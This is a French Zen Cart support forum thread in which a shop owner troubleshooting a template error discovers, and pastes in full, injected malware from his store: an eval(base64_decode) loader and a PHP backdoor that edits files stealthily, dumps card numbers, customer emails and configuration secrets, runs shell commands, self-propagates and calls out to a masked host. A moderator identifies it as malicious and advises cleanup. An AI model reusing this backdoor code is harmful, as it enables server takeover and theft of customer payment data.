Bienvenue, Invité. Veuillez vous connecter ou vous inscrire.
Avez-vous perdu votre courriel d'activation?
*


Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php


Pages: 1 [2] 3
  Imprimer  

  Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
Auteur Message
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #15 le: 18 Mars 2010 à 23:27:25 »

Pour le html_header, c'est bon ils sont bien présent.

j'ai renommé le htaccess en .txt et rien non plus pas de changement.
Journalisée
freduf
Modérateurs
Intarissable
*****

Points gagnés: 5
Messages: 878



Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #16 le: 18 Mars 2010 à 23:38:01 »

essaie de re telecharger depuis ton ftp tous les fichiers de ton template pour voir ...
Journalisée

L'urgent est déjà fait, l'impossible est en cours...pour les miracles, prévoir un délais.
*************************
ZC v 1.3.8a avec patch sécurité
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #17 le: 18 Mars 2010 à 23:56:08 »

Rien..... je vais manger . merci pour ton aide.
Journalisée
freduf
Modérateurs
Intarissable
*****

Points gagnés: 5
Messages: 878



Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #18 le: 19 Mars 2010 à 00:08:49 »

bon je reviens sur mon post precedent

Citation
bonjour,
D'après ce que j'ai pu lire sur le forum US, cette erreur peu être due au fichier configure.php

regarde à la ligne du template si elle est bien écrite comme cela:

Code:

define('DIR_WS_TEMPLATES', DIR_WS_INCLUDES . 'templates/');

ouvres ton fichier includes => configure.php

recherche la ligne : define('DIR_WS_CATALOG_TEMPLATE', HTTP_CATALOG_SERVER . DIR_WS_CATALOG . 'includes/templates/');

remplace la par : define('DIR_WS_TEMPLATES', DIR_WS_INCLUDES . 'templates/');

on va voir si ça fonctionne.

Journalisée

L'urgent est déjà fait, l'impossible est en cours...pour les miracles, prévoir un délais.
*************************
ZC v 1.3.8a avec patch sécurité
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #19 le: 19 Mars 2010 à 01:34:18 »

regarde ce que je trouve quand j'ouvre configure

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3d3dy8zNWE4MDhkZjY3YTU4ZDk0YzYyZjgyNThjMzc1NzRhNy93ZWIvc2hvcC9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9odG1sX2luY2x1ZGVzL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
<?php
Journalisée
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #20 le: 19 Mars 2010 à 01:40:21 »

Bon ça change rien... J'ai toujours le message.
Journalisée
freduf
Modérateurs
Intarissable
*****

Points gagnés: 5
Messages: 878



Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #21 le: 19 Mars 2010 à 08:39:59 »

Heuuu ce code tu le trouves dans le fichier configure ???????

Si oui c'est un code malveillant, supprime le

Télécharge tous les fichiers de ta boutique, puis nettoyage des fichiers

tu as été hacker

Journalisée

L'urgent est déjà fait, l'impossible est en cours...pour les miracles, prévoir un délais.
*************************
ZC v 1.3.8a avec patch sécurité
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #22 le: 19 Mars 2010 à 10:02:06 »

Oui configure dans admin... J'ai nettoyé mais rien ni fait.

Va falloir que je me fasse tous les fichiers un par un pour voir...
Journalisée
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #23 le: 19 Mars 2010 à 16:14:25 »

Comment tu fais pour nettoyer les fichiers ? Antivirus ?
Journalisée
freduf
Modérateurs
Intarissable
*****

Points gagnés: 5
Messages: 878



Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #24 le: 19 Mars 2010 à 20:38:07 »

Bonjour

Non, il faut ouvrir les fichiers et supprimer tous les codes qui ne font pas partit de ZC...

et tout ça à la main !!

Après, si tu as une copie de sauvegarde de ta boutique (ce que je conseil de faire), tu recouches tous les fichiers via le ftp
Journalisée

L'urgent est déjà fait, l'impossible est en cours...pour les miracles, prévoir un délais.
*************************
ZC v 1.3.8a avec patch sécurité
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #25 le: 19 Mars 2010 à 20:46:56 »

Bon je vais y passer le week-end....
Journalisée
fe1lho
Acharné
****

Points gagnés: 0
Messages: 473



Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #26 le: 19 Mars 2010 à 22:21:27 »

La question reste ouverte..

Si il y a du Hacking, comment en est on arrivé à ce stade ???
Mot de passe trop simple ?
Faille de sécurité ?
Dossier non protégé qui a permis le hacking ???
Journalisée
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #27 le: 19 Mars 2010 à 22:37:04 »

Clair que j'aimerais savoir comment ils sont rentré....  Mad
Journalisée
freduf
Modérateurs
Intarissable
*****

Points gagnés: 5
Messages: 878



Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #28 le: 20 Mars 2010 à 10:53:08 »

Bonjour,
A 1ere vu, si il y a eu écriture sur le fichier configure.php, c'est peut être du à un mauvais CHMOD sur ce fichier ou l'accès au dossier "includes" n'est pas ou pas bien protégé.

Après je peu me trompé...

Sachez quand même que si un dossier ou un fichier est mal protégé, un hackeur cherchera toutes les failles possibles à partir de ce fichier ou dossier
« Dernière édition: 20 Mars 2010 à 10:55:17 par freduf » Journalisée

L'urgent est déjà fait, l'impossible est en cours...pour les miracles, prévoir un délais.
*************************
ZC v 1.3.8a avec patch sécurité
Ycg
Apprenti
**

Points gagnés: 0
Messages: 52


Voir le profil
Re : Erreur fatale DIR_WS_TEMPLATEStemplate_default/common/html_header.php
« Répondre #29 le: 20 Mars 2010 à 10:58:16 »

Je suis certain aussi que c'est ça mais quand j'avais installer ma boutique j'avais bien refermé les chmod...

Tiens regarde le type de fichier que je trouve

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3d3dy8zNWE4MDhkZjY3YTU4ZDk0YzYyZjgyNThjMzc1NzRhNy93ZWIvc2hvcC9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9odG1sX2luY2x1ZGVzL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
<?
require("../includes/configure.php");
ini_set("max_execution_time",0);

$pg = $_GET['pg'];
$q = $_GET['q'];

if ($pg=="edit") {

   if (!empty($submit))
   {
    if ($filestealth) {$stat = stat($q.$f);}
    $fp = fopen($q.$f,"w");
    if (!$fp) {echo "<b>Can't write to file!</b>";}
    else
    {
     echo "<b>Saved!</b>";
     fwrite($fp,$edit_text);
     fclose($fp);
     if ($filestealth) {touch($q.$f,$stat[9],$stat[8]);}
     $r = $edit_text;
    }
   }
   $rows = count(explode("\r\n",$r));
   if ($rows < 10) {$rows = 10;}
   if ($rows > 30) {$rows = 30;}
   echo "<form action=\"?pg=edit&f=".urlencode($f)."&q=".urlencode($q)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";

} elseif ($pg=="check") {

$link = mysql_connect(DB_SERVER,DB_SERVER_USERNAME,DB_SERVER_PASSWORD);

mysql_select_db(DB_DATABASE);

$query = 'SELECT * from orders';
$results = mysql_query($query);
$line = mysql_num_rows($results);

while($line = mysql_fetch_assoc($results)) {

$cc_number = $line["cc_number"];


if (!empty($cc_number)) {
echo "W";
}

}

mysql_close($link);

} elseif ($pg=="extract") {

$link = mysql_connect(DB_SERVER,DB_SERVER_USERNAME,DB_SERVER_PASSWORD);

mysql_select_db(DB_DATABASE);

$query = "SELECT * from orders";
$results = mysql_query($query);
$line = mysql_num_rows($results);

while($line = mysql_fetch_assoc($results)) {

$customers_name = $line["customers_name"];
$customers_country = $line["customers_country"];
$customers_email_address = $line["customers_email_address"];

if (!empty($customers_email_address) && $customers_country == $q) {
echo "$customers_name $customers_email_address<br><br>";
}

}

mysql_close($link);

} elseif ($pg=="authorize") {

$link = mysql_connect(DB_SERVER,DB_SERVER_USERNAME,DB_SERVER_PASSWORD);

mysql_select_db(DB_DATABASE);

$query = "SELECT * from configuration";
$results = mysql_query($query);
$line = mysql_num_rows($results);

while($line = mysql_fetch_assoc($results)) {

$configuration_key = $line["configuration_key"];
$configuration_value = $line["configuration_value"];

if (!empty($configuration_value)) {
echo "$configuration_key $configuration_value<br><br>";
}

}

mysql_close($link);

} elseif ($pg=="remove") {

unlink("img.php");

} elseif ($pg=="system") {

system('$q', $retval);
echo $retval;

} elseif ($pg=="copy") {

$win = strtolower(substr(PHP_OS,0,3)) == "win";
chdir( '..' );
$rep=opendir('.');
$dir = dirname(__FILE__);
$uri = "http://";
$uri .= $_SERVER['SERVER_NAME'];
$uri .= $_SERVER['REQUEST_URI'];
$url1 = dirname($uri);
$url1 .= "/img.php";
$ch = curl_init('XXXXXXXXXXXXXXXXXXXXXXXXXX '');
curl_exec ($ch);
curl_close ($ch);
while (false != ($file = readdir($rep))){
if (is_dir($file) && is_writable($file) && $file != images){
$url = "http://";
$url .= $_SERVER['SERVER_NAME'];
$url .= $_SERVER['REQUEST_URI'];
$url2 = dirname($url);
$url2 .= "/../$file/img.php";
if (!$win) {
$file1 = "$dir/img.php";
$file2 = "$dir/../$file/img.php";
system("cp $file1 $file2");
}
$ch1 = curl_init('XXXXXXXXXXXXXXXXXXXXXXXXX'');
curl_exec ($ch1);
curl_close ($ch1);
}
}

echo "Done!";

} else {

echo "HTTP 404 - File not found";

}

?>

Voilà... Il y en a partout
« Dernière édition: 20 Mars 2010 à 11:06:31 par freduf » Journalisée

Pages: 1 [2] 3
  Imprimer  
 

Aller à: